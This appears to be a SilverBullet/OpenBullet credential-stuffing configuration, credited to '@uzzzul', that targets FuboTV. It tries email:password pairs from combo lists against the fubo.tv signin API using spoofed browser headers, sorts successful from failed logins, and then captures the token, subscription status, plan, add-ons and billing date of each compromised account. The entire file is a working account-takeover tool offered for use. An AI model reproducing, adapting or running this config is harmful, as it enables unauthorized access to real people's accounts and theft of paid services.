[SETTINGS]
{
  "Name": "FUBOTV",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-02-18T22:11:02.1025763+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "FUBOTV",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#GEN_ID FUNCTION RandomString "?d?l?u?l-?u?u?u?l?l?l?l?u?l?l?l?l?l" -> VAR "id" 

#LOGIN REQUEST PUT "https://api.fubo.tv/signin" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 60" 
  HEADER "content-type: application/json" 
  HEADER "cookie: ajs_anonymous_id=%22zd-Fn0DSNEh0pZrRi7%22" 
  HEADER "origin: https://www.fubo.tv" 
  HEADER "referer: https://www.fubo.tv/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Mobile Safari/537.36" 
  HEADER "x-client-version: R20220216.2" 
  HEADER "x-device-app: web" 
  HEADER "x-device-group: desktop" 
  HEADER "x-device-id: <id>" 
  HEADER "x-device-model: Windows NT 10.0 Chrome 98.0.4758.102" 
  HEADER "x-device-platform: desktop" 
  HEADER "x-device-type: desktop" 
  HEADER "x-player-version: 1.53.0" 
  HEADER "x-preferred-language: en-US" 

#KEY_CHECK KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"error\":{\"code\":\"INVALID_USERNAME_PASSWORD" 
    KEY "message\":\"That email and password combination is not valid" 
    KEY "lc_message\":\"That email and password combination is not valid.\"}}" 
    KEY "<RESPONSECODE>" Contains "401" 
  KEYCHAIN Success OR 
    KEY "access_token" 
    KEY "<COOIES>" Contains "fubo_public_sid_prod" 

#TOKEN PARSE "<SOURCE>" JSON "access_token" -> VAR "tk" 

#SUBSCRIPTION REQUEST GET "https://api.fubo.tv/subscription" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 Edg/84.0.522.59" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Bearer <Token>" 
  HEADER "dnt: 1" 
  HEADER "origin: https://www.fubo.tv" 
  HEADER "referer: https://www.fubo.tv/signin" 
  HEADER "x-client-version: R20200811.2" 
  HEADER "x-device-app: web" 
  HEADER "x-device-group: desktop" 
  HEADER "x-device-id: R7HevthJZNHLZ9Mk_Z" 
  HEADER "x-device-model: Windows NT 10.0 Microsoft Edge 84.0.522.59" 
  HEADER "x-device-platform: desktop" 
  HEADER "x-device-type: desktop" 
  HEADER "x-player-version: 1.37.4" 
  HEADER "x-preferred-language: en-US" 

#STATUS PARSE "<SOURCE>" LR "\"state\":\"" "\"" CreateEmpty=FALSE -> CAP "Status" 

#PLAN PARSE "<SOURCE>" LR "\"plan\":{\"name\":\"" "\"" CreateEmpty=FALSE -> CAP "Plan" 

#ADD PARSE "<SOURCE>" LR "\"add_ons\":[" "]" Recursive=TRUE -> VAR "Add" 

#ADDONS PARSE "<Add>" LR "\"name\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Add-ons" 

#NEXT-BILLING PARSE "<SOURCE>" LR "\"current_period_ends_at\":\"" "T" CreateEmpty=FALSE -> CAP "Next Billing" 

#FREE KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"state\":\"expired\"" 
    KEY "\"state\":\"canceled\"" 
    KEY "\"user does not have a subscription\"" 
    KEY "SUBSCRIPTION_NOT_FOUND" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

